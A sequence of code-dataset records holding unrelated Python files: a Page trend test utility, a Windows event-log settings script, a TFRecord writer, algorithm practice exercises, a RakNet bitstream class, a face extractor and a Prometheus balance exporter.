is not None:\n            fig.savefig(save, dpi=200)\n\n        plt.close(fig)\n        return \n\n    def test(self):\n        \"\"\"Perform the Page Trend Test on the problems added so far\"\"\"\n        r = ptest(self.matrix)\n        print(\"Page Test (%d problems, %d cuts) results: L=%.2f, p-value=%.5f, method=%s\" % (len(self.matrix), self.num_cuts, r.statistic, r.pvalue, r.method))\n        print(\" > We assume that if p<0.05 algorithm A converges faster than B, or if p>0.95 algorithm B converges faster than A, otherwise we cannot say anything.\")\n        return\n\n\n    def add_problem_interp(self, xA: np.ndarray, yA: np.ndarray, xB: np.ndarray, yB: np.ndarray):\n        \"\"\" Adds the results from two algorithms.\n        - Takes the two evolutionary algorithm curves and creates two new\n        interpolated arrays with a unified x axis.\n        - These are the \"c cut points\" used to subtract the results\n        and formulate the A-B trend.\n        \"\"\"\n\n        # # Ensure the interpolation gives values close to what we are looking for\n        l = max(len(xA), len(xB))\n        nps = (int(l/self.num_cuts)+1)*self.num_cuts*10\n        # print(\"l:\", l, \", nps:\", nps)\n\n        # # Make sure the max value is the same between all algo piece-wise combos\n        if self.max_x is None:\n            max_x = max([max(xB), max(xA)])\n            # max_x = np.around(max_x, decimals=0)\n        else:\n            max_x = self.max_x\n\n        # # Interpolate to a larger number of points\n        new_x = 
np.linspace(0, max_x, num=nps)\n        new_yA = np.interp(new_x, xA, yA)\n        new_yB = np.interp(new_x, xB, yB)\n\n        # # Cut down to the newer number of points\n        cuts = []\n        real_c_locs = []\n        c_locs = np.linspace(0, max_x, num=self.num_cuts)\n        for c in c_locs:\n            idx, val = self.find_nearest(new_x, c)\n            if self.invert == 0:\n                cuts.append(new_yA[idx]-new_yB[idx])\n            elif self.invert == 1:\n                cuts.append(new_yB[idx]-new_yA[idx])\n            real_c_locs.append(val)\n\n        # # Apply inversion to y values\n        if self.invert == 0:\n            y = new_yA-new_yB\n        elif self.invert == 1:\n            y = new_yB-new_yA\n\n        # # relative x axis in terms of cuts\n        rel_x = (new_x/np.max(new_x))*(self.num_cuts-1)\n\n\n        DataGroup = namedtuple('PageCuts', ['x', 'y', 'cuts_x', 'cuts_y', 'cx'])\n        results = DataGroup(new_x, y, c_locs, cuts, rel_x)\n\n        self.results_so_far.append(results)\n\n        return \n    \n\n    def add_problem(self, x: np.ndarray, yA: np.ndarray, yB: np.ndarray):\n        \"\"\" Adds the results from two algorithms.\n        - Takes the two evolutionary algorithm curves.\n        - These are the \"c cut points\" used to subtract the results\n        and formulate the A-B trend.\n        \"\"\"\n\n        # # Make sure the max value is the same between all algo piece-wise combos\n        if self.max_x is None:\n            max_x = max(x)\n            # max_x = np.around(max_x, decimals=0)\n        else:\n            max_x = self.max_x\n\n        # # Cut down to the newer number of points\n        cuts = []\n        real_c_locs = []\n        c_locs = np.linspace(0, max_x, num=self.num_cuts)\n        for c in c_locs:\n            idx, val = self.find_nearest(x,c)\n\n            if self.invert == 0:\n                cuts.append(yA[idx]-yB[idx])\n            elif self.invert == 1:\n                cuts.append(yB[idx]-yA[idx])\n            real_c_locs.append(val)\n\n        # # Apply inversion to y values\n        if self.invert == 0:\n            y = yA-yB\n        elif self.invert == 1:\n            y = yB-yA\n\n        # # cuts on the original x axis\n        rel_x = (x/np.max(x))*(self.num_cuts-1)\n\n\n        DataGroup = namedtuple('PageCuts', ['x', 'y', 'cuts_x', 'cuts_y', 'cx'])\n        results = DataGroup(x, y, c_locs, cuts, rel_x)\n\n        self.results_so_far.append(results)\n\n        return \n\n    def find_nearest(self, array, location):\n        \"\"\"Find the index & value of the point in an array closest to the desired cut location \"\"\"\n        array = np.asarray(array)\n        idx = (np.abs(array - location)).argmin()\n        return idx, array[idx] ","repo_name":"benedictjones/pyeas","sub_path":"pyeas/_pagetest.py","file_name":"_pagetest.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
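A hedged usage sketch for the PageTest class above, with synthetic exponential curves standing in for real EA convergence data; the import path is assumed from the record's sub_path:

import numpy as np
from pyeas._pagetest import PageTest  # import path assumed

pt = PageTest(num_cuts=5)
x = np.linspace(0.0, 100.0, 50)
for offset in range(8):                     # more problems added than cuts, as required
    yA = np.exp(-0.10 * x) + 0.01 * offset  # algorithm A converges faster
    yB = np.exp(-0.05 * x) + 0.01 * offset
    pt.add_problem(x, yA, yB)
pt.test()  # prints the Page trend test statistic and p-value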
+{"seq_id":"32278554239","text":"from my_tools import Registros\nlogs = ['Security', 'Application', 'System']\n\nclass do_undo:\n    \"\"\" event logs \"\"\"\n    def do():\n        for log in logs:\n            if log == 'Security':\n                valor = '512032768'\n            else:\n                valor = '51183616'\n\n            Registros.set(KEYNAME=r'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\{}'.format(log), t='REG_DWORD', AutoBackupLogFiles=1, MaxSize=valor)\n\n    def undo():\n        for log in logs:\n            Registros.set(KEYNAME=r'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\{}'.format(log), t='REG_DWORD', AutoBackupLogFiles=0)","repo_name":"iagoofelipe/AutoConfig","sub_path":"AutoConfig3.0.0/src/config/eventlog.py","file_name":"eventlog.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69904351522","text":"import os\n\nimport pandas as pd\nfrom tensorflow.io import read_file\nfrom tensorflow.train import Feature\nfrom tensorflow.train import Example\nfrom tensorflow.train import Features\nfrom tensorflow.io import encode_jpeg\nfrom tensorflow.io import decode_jpeg\nfrom tensorflow.train import Int64List\nfrom tensorflow.train import BytesList\nfrom tensorflow.io import TFRecordWriter\n\n\ndef image_feature(value):\n\t# Returns a bytes_list from a string / byte\n\treturn Feature(\n\t\tbytes_list=BytesList(value=[encode_jpeg(value).numpy()])\n\t)\n\n\ndef int64_feature(value):\n\t# Returns an int64_list from a bool / enum / int / uint\n\treturn Feature(int64_list=Int64List(value=[value]))\n\n\ndef create_example(image, source_age_group, target_age_group):\n\t# Creates a single entry for the tfrecord\n\tfeature = {\"image\": image_feature(image), \"source_age_group\": int64_feature(source_age_group),\n\t           \"target_age_group\": int64_feature(target_age_group)}\n\treturn Example(features=Features(feature=feature))\n\n\ndef tf_writer(data: pd.DataFrame, num_tfrecords: int, num_samples: int, tfrecords_dir: str, folder_path: str,\n              age_groups: list) -> None:\n\t# Writes each image's data to the tfrecord along with the 13 other target ages\n\tfor tfrec_num in range(num_tfrecords):\n\t\tsamples = data.iloc[(tfrec_num * num_samples): ((tfrec_num + 1) * num_samples)]\n\t\twith TFRecordWriter(tfrecords_dir + \"/file_%.2i-%i.tfrec\" % (tfrec_num, len(samples))) as writer:\n\t\t\tfor index, sample in samples.iterrows():\n\t\t\t\timage_path = folder_path + \"/\" + sample[\"img\"]\n\t\t\t\timage = decode_jpeg(read_file(image_path))\n\t\t\t\tfor value in age_groups:\n\t\t\t\t\tif sample[\"age_group\"] != value:\n\t\t\t\t\t\texample = create_example(image, sample[\"age_group\"], value)\n\t\t\t\t\t\twriter.write(example.SerializeToString())\n\n\ndef write_tfrecords(data: pd.DataFrame, job_dir: str = \"..\") -> None:\n\t# Runs the writer function on the data\n\tnum_samples = 4096\n\tnum_tfrecords = data.shape[0] // num_samples\n\ttfrecords_dir = job_dir + \"/tfrecords\"\n\tfolder_path = job_dir + \"/UTKFace\"\n\tage_groups = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n\n\tif data.shape[0] % num_samples:\n\t\tnum_tfrecords += 1  # add one record if there are any remaining samples\n\n\tif not os.path.exists(tfrecords_dir):\n\t\tos.makedirs(tfrecords_dir)\n\n\t# Shuffle the data and then pass it to the writer function\n\ttf_writer(data.sample(frac=1, random_state=12), num_tfrecords, num_samples, tfrecords_dir, folder_path, age_groups)\n","repo_name":"SauravSJK/Face-Aging-using-GAN","sub_path":"Code/write_tfrecords.py","file_name":"write_tfrecords.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"446735014","text":"# Forth\n# Evaluate postfix notation with a stack\n\n# import sys\n# sys.stdin = open('input.txt', 'r')\n'''\ndef get_result(postfix):\n    stack = []\n    result = 0\n    # num_cnt = 0 # number of operands\n    # cnt = 0 # number of operators\n\n    # for i in postfix:\n    #     if \"0\" <= i <= \"9\":\n    #         num_cnt += 1\n    #     else:\n    #         cnt += 1\n    # # error if there are not more operands than operators\n    # if not num_cnt > cnt:\n    #     return \"error\"\n\n    for c in postfix:\n        # push operands onto the stack\n        if \"0\" <= c <= \"9\":\n            stack.append(int(c))\n        # on an operator, pop two operands and compute\n        elif c == \".\":\n            break\n\n        else:\n            # two operands and one operator leave one result on the stack\n            if len(stack) >= 2:\n                right = stack.pop() # right-hand side first\n                left = stack.pop()\n\n                if c == \"+\":\n                    result = left + right\n                elif c == \"-\":\n                    result = left - right\n                elif c == \"*\":\n                    result = left * right\n                elif c == \"/\":\n                    result = left // right\n                # push the result value onto the stack\n                stack.append(result)\n            else:\n                return \"error\"\n\n    return stack.pop()\n\nt = int(input())\nfor tc in range(1, t+1):\n    postfix = 
input().split()\n    # postfix = ls[:-1]\n\n    print(f'#{tc} {get_result(postfix)}')\n'''\n# Maze search\n'''\n# up, down, left, right\ndr = [-1, 1, 0, 0]\ndc = [0, 0, -1, 1]\n\ndef dfs(r, c, n):\n    # array for recording visits\n    visited = [[0]*n for _ in range(n)]\n    stack = []\n\n    while True:\n        # if cell (r, c) is 3, success: return 1\n        if arr[r][c] == 3:\n            return 1\n        for d in range(4):\n            nr = r + dr[d]\n            nc = c + dc[d]\n            # if within bounds, not a wall (1), and not yet visited,\n            if 0 <= nr < n and 0 <= nc < n and arr[nr][nc] != 1 and not visited[nr][nc]:\n                # mark as visited\n                visited[nr][nc] = 1\n                # push the coordinates onto the stack\n                stack.append((r, c))\n                # move the starting point to the next position\n                r, c = nr, nc\n                break\n        else:\n            # if the stack is non-empty, pop one and go back\n            if stack:\n                r, c = stack.pop()\n            # if it is empty, stop (every reachable path has been tried)\n            else:\n                break\n    # escape failed\n    return 0\n\n\nt = int(input())\nfor tc in range(1, t+1):\n    n = int(input())\n    arr = [list(map(int, input())) for _ in range(n)]\n    r, c = 0, 0\n\n    for i in range(n):\n        for j in range(n):\n            # save the coordinates of starting point 2\n            if arr[i][j] == 2:\n                r, c = i, j\n    print(f'#{tc} {dfs(r, c, n)}')\n'''\n'''\n# Calculator 1\n# Convert the string to postfix notation and evaluate it\n\nt = 10\nfor tc in range(1, t+1):\n    n = int(input())\n    string = list(input())\n\n    # postfix expression\n    postfix = \"\"\n    stack = []\n\n    for i in range(n):\n        if \"0\" <= string[i] <= \"9\":\n            postfix += string[i]\n        else:\n            stack.append(string[i])\n    while stack:\n        postfix += stack.pop()\n    # print(postfix, stack)\n\n    # evaluate the postfix notation with a stack\n    for c in postfix:\n        if \"0\" <= c <= \"9\":\n            stack.append(int(c))\n        else:\n            p1 = stack.pop()\n            p2 = stack.pop()\n\n            result = p1 + p2\n            stack.append(result)\n    ans = stack.pop()\n\n    print(f'#{tc} {ans}')\n'''\n# Backtracking\n\n# 2806 N-Queen\n\n# place 4 queens on a 4x4 chessboard\n# remain: remaining chess pieces ??\ndef backtracking(row, remain):\n    #\n    global cnt\n\n    # 1. termination condition: all n queens have been placed\n    if row == n and remain == 0:\n        cnt += 1\n        return\n\n    # 2. 
recursive call\n\n    # can a queen be placed in column i of the current row?\n    for i in range(n):\n        # assume by default that it can be placed\n        can_place = True\n        # check the column for a queen (from 0 up to row; rows past row hold no values yet, so the loop stops there)\n        for j in range(row):\n            if board[j][i] == 1:\n                can_place = False\n                break\n        # check the diagonals for a queen\n        # step up one row at a time: j\n        for j in range(1, row+1):\n            # upper-left\n            # -j: because it is subtracted by the same amount\n            if row - j >= 0 and i - j >= 0 and board[row-j][i-j]:\n                can_place = False\n                break\n\n            # upper-right\n            if row - j >= 0 and i + j < n and board[row-j][i+j]:\n                can_place = False\n                break\n\n        # check whether it can be placed\n        if can_place:\n            # if it can, place it here and move on to the next row\n            board[row][i] = 1\n            backtracking(row + 1, remain -1)\n            # remove the queen that was at column i of row\n            board[row][i] = 0\n\nt = int(input())\nfor tc in range(1, t+1):\n    n = int(input())\n    cnt = 0\n\n    # build the board\n    board = [[0] * n for _ in range(n)]\n    backtracking(0, n)\n\n    print(f'#{tc} {cnt}')\n\n    # with input 2 / 1 / 2, the output is 1 and 0\n","repo_name":"ddingdu/Python_Algorithm","sub_path":"SWEA/0215 SWEA.py","file_name":"0215 SWEA.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42181980163","text":"import math\r\nimport struct\r\n\r\nclass Struct(struct.Struct):\r\n\t# cast-like syntax for packing\r\n\tdef __call__(self, value):\r\n\t\treturn self.pack(value)\r\n\r\n\tdef __str__(self):\r\n\t\treturn \"<Struct %s>\" % self.format\r\n\r\nc_bool = Struct(\"?\")\r\nc_float = Struct(\"f\")\r\nc_double = Struct(\"d\")\r\nc_int = Struct(\"i\")\r\nc_uint = Struct(\"I\")\r\n\r\nc_byte = Struct(\"b\")\r\nc_ubyte = Struct(\"B\")\r\nc_short = Struct(\"h\")\r\nc_ushort = Struct(\"H\")\r\nc_long = Struct(\"l\")\r\nc_ulong = Struct(\"L\")\r\nc_longlong = Struct(\"q\")\r\nc_ulonglong = Struct(\"Q\")\r\n\r\nc_int8 = c_byte\r\nc_uint8 = c_ubyte\r\nc_int16 = c_short\r\nc_uint16 = c_ushort\r\nc_int32 = c_long\r\nc_uint32 = c_ulong\r\nc_int64 = c_longlong\r\nc_uint64 = c_ulonglong\r\n\r\nclass c_bit:\r\n\tdef __init__(self, boolean):\r\n\t\tself.value = boolean\r\n\r\n# Note: a ton of the logic here assumes that the write offset is never moved back, that is, that you never overwrite things\r\n# Doing so may break everything\r\nclass BitStream(bytearray):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper().__init__(*args, **kwargs)\r\n\t\tself._write_offset = len(self) * 8\r\n\t\tself._read_offset = 0\r\n\r\n\tdef write(self, arg, compressed=False, allocated_length:\"for fixed-length strings\"=None, length_type:\"for variable-length strings\"=None):\r\n\t\tif isinstance(arg, BitStream):\r\n\t\t\tself._write_bytes(arg)\r\n\t\t\tif arg._write_offset % 8 != 0:\r\n\t\t\t\t# this should work assuming the part after the arg's write offset is completely 0\r\n\t\t\t\tself._write_offset -= 8 - arg._write_offset % 8\r\n\t\t\t\t# in some cases it's possible we've written an unnecessary byte\r\n\t\t\t\tif self._write_offset//8 == len(self)-2:\r\n\t\t\t\t\tdel self[-1]\r\n\t\t\treturn\r\n\t\tif allocated_length is not None or length_type is not None:\r\n\t\t\tself._write_str(arg, allocated_length, length_type)\r\n\t\t\treturn\r\n\t\tif isinstance(arg, (bytes, bytearray)):\r\n\t\t\tif compressed:\r\n\t\t\t\tself._write_compressed(arg)\r\n\t\t\telse:\r\n\t\t\t\tself._write_bytes(arg)\r\n\t\t\treturn\r\n\t\tif isinstance(arg, c_bit):\r\n\t\t\tself._write_bit(arg.value)\r\n\t\t\treturn\r\n\r\n\t\traise TypeError(arg)\r\n\r\n\tdef _write_str(self, str_, allocated_length, length_type):\r\n\t\t# possibly include default encoded lengths for non-variable-length strings (seem to be 33 for string and 66 
for wstring)\r\n\t\tif isinstance(str_, str):\r\n\t\t\tencoded_str = str_.encode(\"utf-16-le\")\r\n\t\telse:\r\n\t\t\tencoded_str = str_\r\n\r\n\t\tif length_type is not None:\r\n\t\t\t# Variable-length string\r\n\t\t\tself.write(length_type(len(str_))) # note: there's also a version that uses the length of the encoded string, should that be used?\r\n\t\telse:\r\n\t\t\t# Fixed-length string\r\n\t\t\t# null terminator\r\n\t\t\tif isinstance(str_, str):\r\n\t\t\t\tchar_size = 2\r\n\t\t\telse:\r\n\t\t\t\tchar_size = 1\r\n\r\n\t\t\tif len(encoded_str)+char_size > allocated_length:\r\n\t\t\t\traise ValueError(\"String too long!\")\r\n\t\t\tencoded_str += bytes(allocated_length-len(encoded_str))\r\n\t\tself._write_bytes(encoded_str)\r\n\r\n\tdef _write_bit(self, bit):\r\n\t\tself._alloc_bits(1)\r\n\t\tif bit: # we don't actually have to do anything if the bit is 0\r\n\t\t\tself[self._write_offset//8] |= 0x80 >> self._write_offset % 8\r\n\r\n\t\tself._write_offset += 1\r\n\r\n\tdef write_bits(self, value, number_of_bits):\r\n\t\tassert 0 < number_of_bits < 8\r\n\t\tself._alloc_bits(number_of_bits)\r\n\r\n\t\tif number_of_bits < 8: # In the case of a partial byte, the bits are aligned from the right (bit 0) rather than the left (as in the normal internal representation)\r\n\t\t\tvalue = value << (8 - number_of_bits) & 0xff # Shift left to get the bits on the left, as in our internal representation\r\n\t\tif self._write_offset % 8 == 0:\r\n\t\t\tself[self._write_offset//8] = value\r\n\t\telse:\r\n\t\t\tself[self._write_offset//8] |= value >> self._write_offset % 8 # First half\r\n\t\t\tif 8 - self._write_offset % 8 < number_of_bits: # If we didn't write it all out in the first half (8 - self._write_offset % 8 is the number we wrote in the first half)\r\n\t\t\t\tself[self._write_offset//8 + 1] = (value << 8 - self._write_offset % 8) & 0xff # Second half (overlaps byte boundary)\r\n\r\n\t\tself._write_offset += number_of_bits\r\n\r\n\tdef _write_bytes(self, byte_arg):\r\n\t\tif self._write_offset % 8 == 0:\r\n\t\t\tself[self._write_offset//8:self._write_offset//8+len(byte_arg)] = byte_arg\r\n\t\telse:\r\n\t\t\t# shift new input to current shift\r\n\t\t\tnew = (int.from_bytes(byte_arg, \"big\") << (8 - self._write_offset % 8)).to_bytes(len(byte_arg)+1, \"big\")\r\n\t\t\t# update current byte\r\n\t\t\tself[self._write_offset//8] |= new[0]\r\n\t\t\t# add rest\r\n\t\t\tself[self._write_offset//8+1:self._write_offset//8+1+len(byte_arg)] = new[1:]\r\n\t\tself._write_offset += len(byte_arg)*8\r\n\r\n\tdef _write_compressed(self, byte_arg):\r\n\t\tcurrent_byte = len(byte_arg) - 1\r\n\r\n\t\t# Write upper bytes with a single 1\r\n\t\t# From high byte to low byte, if high byte is 0 then write 1. Otherwise write 0 and the remaining bytes\r\n\t\twhile current_byte > 0:\r\n\t\t\tis_zero = byte_arg[current_byte] == 0\r\n\t\t\tself._write_bit(is_zero)\r\n\t\t\tif not is_zero:\r\n\t\t\t\t# Write the remainder of the data\r\n\t\t\t\tself._write_bytes(byte_arg[:current_byte + 1])\r\n\t\t\t\treturn\r\n\t\t\tcurrent_byte -= 1\r\n\r\n\t\t# If the upper half of the last byte is 0 then write 1 and the remaining 4 bits. 
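A worked round-trip sketch of the compressed write scheme described in the comments above, assuming the module is importable as pyraknet.bitstream and a little-endian native byte order:

from pyraknet.bitstream import BitStream, c_uint  # import path assumed

stream = BitStream()
stream.write(c_uint(5), compressed=True)  # three zero upper bytes cost one bit each
stream.write(c_uint(5))                   # uncompressed form takes the full 4 bytes
out = BitStream(bytes(stream))
assert out.read(c_uint, compressed=True) == 5
assert out.read(c_uint) == 5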
Otherwise write 0 and the 8 bits.\r\n\r\n\t\tis_zero = byte_arg[0] & 0xF0 == 0x00\r\n\t\tself._write_bit(is_zero)\r\n\t\tif is_zero:\r\n\t\t\tself.write_bits(byte_arg[0], 4)\r\n\t\telse:\r\n\t\t\tself._write_bytes(byte_arg[:1])\r\n\r\n\tdef align_write(self):\r\n\t\tif self._write_offset % 8 != 0:\r\n\t\t\tself._alloc_bits(8 - self._write_offset % 8)\r\n\t\t\tself._write_offset += 8 - self._write_offset % 8\r\n\r\n\tdef _alloc_bits(self, number_of_bits):\r\n\t\tbytes_to_allocate = math.ceil((self._write_offset + number_of_bits) / 8) - len(self)\r\n\t\tif bytes_to_allocate > 0:\r\n\t\t\tself += bytes(bytes_to_allocate)\r\n\r\n\r\n\tdef skip_read(self, byte_length):\r\n\t\tself._read_offset += byte_length * 8\r\n\r\n\tdef read(self, arg_type, compressed=False, length:\"for BitStream (in bits) and for bytes (in bytes)\"=None, allocated_length:\"for fixed-length strings\"=None, length_type:\"for variable-length strings\"=None):\r\n\t\tif isinstance(arg_type, struct.Struct):\r\n\t\t\tif compressed:\r\n\t\t\t\tif arg_type in (c_float, c_double):\r\n\t\t\t\t\traise NotImplementedError\r\n\t\t\t\tread = self._read_compressed(arg_type.size)\r\n\t\t\telse:\r\n\t\t\t\tread = self._read_bytes(arg_type.size)\r\n\t\t\treturn arg_type.unpack(read)[0]\r\n\t\tif issubclass(arg_type, c_bit):\r\n\t\t\treturn self._read_bit()\r\n\t\tif allocated_length is not None or length_type is not None:\r\n\t\t\treturn self._read_str(arg_type, allocated_length, length_type)\r\n\t\tif issubclass(arg_type, bytes):\r\n\t\t\treturn self._read_bytes(length)\r\n\t\tif issubclass(arg_type, BitStream):\r\n\t\t\tr = self._read_offset\r\n\t\t\toutput = BitStream(self._read_bytes(length//8))\r\n\t\t\tif length % 8 != 0:\r\n\t\t\t\tendbyte = (self[self._read_offset//8] << self._read_offset % 8) & 0xff\r\n\t\t\t\tif self._read_offset % 8 != 0 and length % 8 > 8 - self._read_offset % 8:\r\n\t\t\t\t\tendbyte |= self[self._read_offset//8 + 1] >> 8 - self._read_offset % 8\r\n\t\t\t\tendbyte &= ~((1 << 8-length%8)-1)\r\n\t\t\t\toutput._write_bytes(bytes([endbyte]))\r\n\t\t\t\toutput._write_offset -= 8 - length % 8\r\n\t\t\t\tself._read_offset += length % 8\r\n\t\t\treturn output\r\n\t\traise TypeError(arg_type)\r\n\r\n\tdef _read_str(self, arg_type, allocated_length, length_type):\r\n\t\tif issubclass(arg_type, str):\r\n\t\t\tchar_size = 2\r\n\t\telse:\r\n\t\t\tchar_size = 1\r\n\r\n\t\tif length_type is not None:\r\n\t\t\t# Variable-length string\r\n\t\t\tlength = self.read(length_type)\r\n\t\t\tbyte_str = self.read(bytes, length=length*char_size)\r\n\t\telse:\r\n\t\t\t# Fixed-length string\r\n\t\t\tbyte_str = bytearray()\r\n\t\t\twhile len(byte_str) < allocated_length:\r\n\t\t\t\tchar = self._read_bytes(char_size)\r\n\t\t\t\tif sum(char) == 0:\r\n\t\t\t\t\tself.skip_read(allocated_length - len(byte_str) - char_size)\r\n\t\t\t\t\tbreak\r\n\t\t\t\tbyte_str += char\r\n\r\n\t\tif issubclass(arg_type, str):\r\n\t\t\treturn byte_str.decode(\"utf-16-le\")\r\n\t\treturn byte_str\r\n\r\n\tdef _read_bit(self):\r\n\t\tbit = self[self._read_offset//8] & 0x80 >> self._read_offset % 8 != 0\r\n\t\tself._read_offset += 1\r\n\t\treturn bit\r\n\r\n\tdef read_bits(self, number_of_bits):\r\n\t\tassert 0 < number_of_bits < 8\r\n\r\n\t\toutput = (self[self._read_offset//8] << self._read_offset % 8) & 0xff # First half\r\n\t\tif self._read_offset % 8 != 0 and number_of_bits > 8 - self._read_offset % 8: # If we have a second half, we didn't read enough bytes in the first half\r\n\t\t\toutput |= self[self._read_offset//8 + 1] >> 8 - self._read_offset % 8 # 
Second half (overlaps byte boundary)\r\n\t\toutput >>= 8 - number_of_bits\r\n\t\tself._read_offset += number_of_bits\r\n\t\treturn output\r\n\r\n\tdef _read_bytes(self, length):\r\n\t\tif self._read_offset % 8 == 0:\r\n\t\t\toutput = self[self._read_offset//8:self._read_offset//8+length]\r\n\t\telse:\r\n\t\t\toutput = self[self._read_offset//8:self._read_offset//8+length+1]\r\n\t\t\t# clear the part before the struct\r\n\t\t\toutput[0] &= (1 << 8-self._read_offset%8) - 1\r\n\t\t\t# shift back\r\n\t\t\toutput = (int.from_bytes(output, \"big\") >> (8-self._read_offset%8)).to_bytes(length, \"big\")\r\n\t\tself._read_offset += length*8\r\n\t\treturn output\r\n\r\n\tdef _read_compressed(self, number_of_bytes):\r\n\t\tcurrent_byte = number_of_bytes - 1\r\n\r\n\t\twhile current_byte > 0:\r\n\t\t\tif self._read_bit():\r\n\t\t\t\tcurrent_byte -= 1\r\n\t\t\telse:\r\n\t\t\t\t# Read the rest of the bytes\r\n\t\t\t\treturn bytearray(number_of_bytes - current_byte - 1) + self._read_bytes(current_byte + 1)\r\n\r\n\t\t# All but the first bytes are 0. If the upper half of the last byte is a 0 (positive) or 16 (negative) then what we read will be a 1 and the remaining 4 bits.\r\n\t\t# Otherwise we read a 0 and the 8 bits\r\n\t\tif self._read_bit():\r\n\t\t\tstart = bytes([self.read_bits(4)])\r\n\t\telse:\r\n\t\t\tstart = self._read_bytes(1)\r\n\t\treturn start + bytearray(number_of_bytes - current_byte - 1)\r\n\r\n\tdef align_read(self):\r\n\t\tif self._read_offset % 8 != 0:\r\n\t\t\tself._read_offset += 8 - self._read_offset % 8\r\n\r\n\tdef all_read(self):\r\n\t\t# This is not accurate to the bit, just to the byte\r\n\t\treturn math.ceil(self._read_offset / 8) == len(self)\r\n","repo_name":"cmarshall108/pyraknet","sub_path":"pyraknet/bitstream.py","file_name":"bitstream.py","file_ext":"py","file_size_in_byte":9671,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"31998907153","text":"\"\"\"\nThis module contains the extract function and its supporting functions.\n\nThe following steps are performed in the extract function:\n\n1. Get a list of all the folders present in the data directory. The name of each folder is the name of the person or the class.\n2. For each folder, get a list of all the files present in the folder. We are interested in video and image files.\n3. Extract faces from videos and images of each person/class and save them in a folder with the name of the person/class.\n4. Repeat steps 1-3 for all the folders present in the data directory.\n\"\"\"\n\nimport os\nimport cv2\nfrom tqdm import tqdm\nimport sys\n\n# Get the absolute path of the parent directory of the script\nparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n\n# Add the parent directory to sys.path\nsys.path.append(parent_dir)\n\nfrom Common.FaceExtractor import FaceExtractor\n\n\ndef extract_faces_from_directory(\n directory_path: str,\n output_directory_path: str,\n method: str = \"dlib\",\n size: tuple = (128, 128),\n) -> None:\n \"\"\"\n Extract faces from images and videos in a directory using the selected face detection method.\n Saves the extracted faces to a folder with the name of the person/class in the specified output directory.\n\n Args:\n directory_path (str): The path to the directory containing the images and videos.\n output_directory_path (str): The path to the directory where the extracted faces should be saved.\n method (str): The face detection method to use. 
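For reference, a hedged usage sketch of this directory-extraction helper (the directory names are hypothetical; `'dlib'` and the 128×128 crop size mirror the function's defaults):

```python
# Hypothetical layout: raw_media/<person>/*.jpg|*.mp4 -> faces/<person>/*.jpg
extract_faces_from_directory(
    directory_path="raw_media",
    output_directory_path="faces",
    method="dlib",        # or "opencv", per the options listed below
    size=(128, 128),
)
```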
Available options are 'dlib' and 'opencv'.\n            Default is 'dlib'.\n        size (tuple): The output size of each extracted face. Default is (128, 128).\n    \"\"\"\n    # Create a FaceExtractor object\n    face_extractor = FaceExtractor(method=method)\n\n    # Iterate over the folders in the directory\n    for folder_name in os.listdir(directory_path):\n        folder_path = os.path.join(directory_path, folder_name)\n\n        # Check if the path is a directory\n        if os.path.isdir(folder_path):\n            print(f\"Extracting faces from {folder_name}...\")\n\n            # Create a folder to save the extracted faces\n            output_folder = os.path.join(output_directory_path, f\"{folder_name}\")\n            os.makedirs(output_folder, exist_ok=True)\n\n            # Iterate over the files in the folder\n            # tqdm is used to display a progress bar\n\n            for file_name in tqdm(os.listdir(folder_path), leave=False):\n                file_path = os.path.join(folder_path, file_name)\n\n                # Check if the path is a file\n                if os.path.isfile(file_path):\n                    # Get the file extension\n                    file_ext = os.path.splitext(file_name)[1]\n\n                    # Extract faces from images and videos\n                    if file_ext in [\".jpg\", \".jpeg\", \".png\"]:\n                        image = cv2.imread(file_path)\n                        faces = face_extractor.extract_faces_from_image(\n                            image, size=size\n                        )\n                    elif file_ext in [\n                        \".mp4\",\n                        \".avi\",\n                        \".mov\",\n                        \".mkv\",\n                        \".flv\",\n                        \".wmv\",\n                        \".webm\",\n                    ]:\n                        faces = face_extractor.extract_faces_from_video(\n                            file_path, frame_skip=15, size=size\n                        )\n                    else:\n                        # Skip files that are neither images nor videos,\n                        # so `faces` is never unbound or stale below\n                        continue\n\n                    # Save the extracted faces to the output folder\n                    for i, face in enumerate(faces):\n                        output_path = os.path.join(\n                            output_folder, f\"{file_name}_{i}.jpg\"\n                        )\n                        cv2.imwrite(output_path, face)\n\n\ndef extract(\n    input_dir: str, output_dir: str, method: str = \"dlib\", size: tuple = (128, 128)\n) -> None:\n    extract_faces_from_directory(input_dir, output_dir, method, size=size)\n","repo_name":"ibadrather/WhoDat","sub_path":"ELT_Pipeline/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}{"seq_id":"12410811350","text":"from prometheus_client import start_http_server, Summary, Gauge\nimport logging, requests, json, yaml\nimport os\nimport time\nimport sys\n\nUPDATE_PERIOD = int(os.environ.get('UPDATE_INTERVAL'))\n\nBALANCE = Gauge('balance',\n                'Hold current account balances',\n                ['balance_type'])\n\ndef main():\n    start_http_server(int(os.environ.get('PORT')))\n\n    while True:\n        # call the alpaca API and get account data\n        a = requests.get(ACCOUNT_URL, headers=HEADERS)\n        account_data = json.loads(a.content)\n\n        equity = float(account_data['last_equity'])\n        cash = float(account_data['buying_power'])\n\n        BALANCE.labels('EQUITY').set(equity)\n        BALANCE.labels('BUYING_POWER').set(cash)\n        time.sleep(UPDATE_PERIOD)\n\nif __name__ == '__main__':\n    try:\n        with open('config.yml') as f:\n            config_data = yaml.safe_load(f)\n\n        alpaca_data = config_data.get(\"alpaca\", {})\n        \n        API_KEY = alpaca_data.get(\"API_KEY\", \"\")\n        SECRET_KEY = 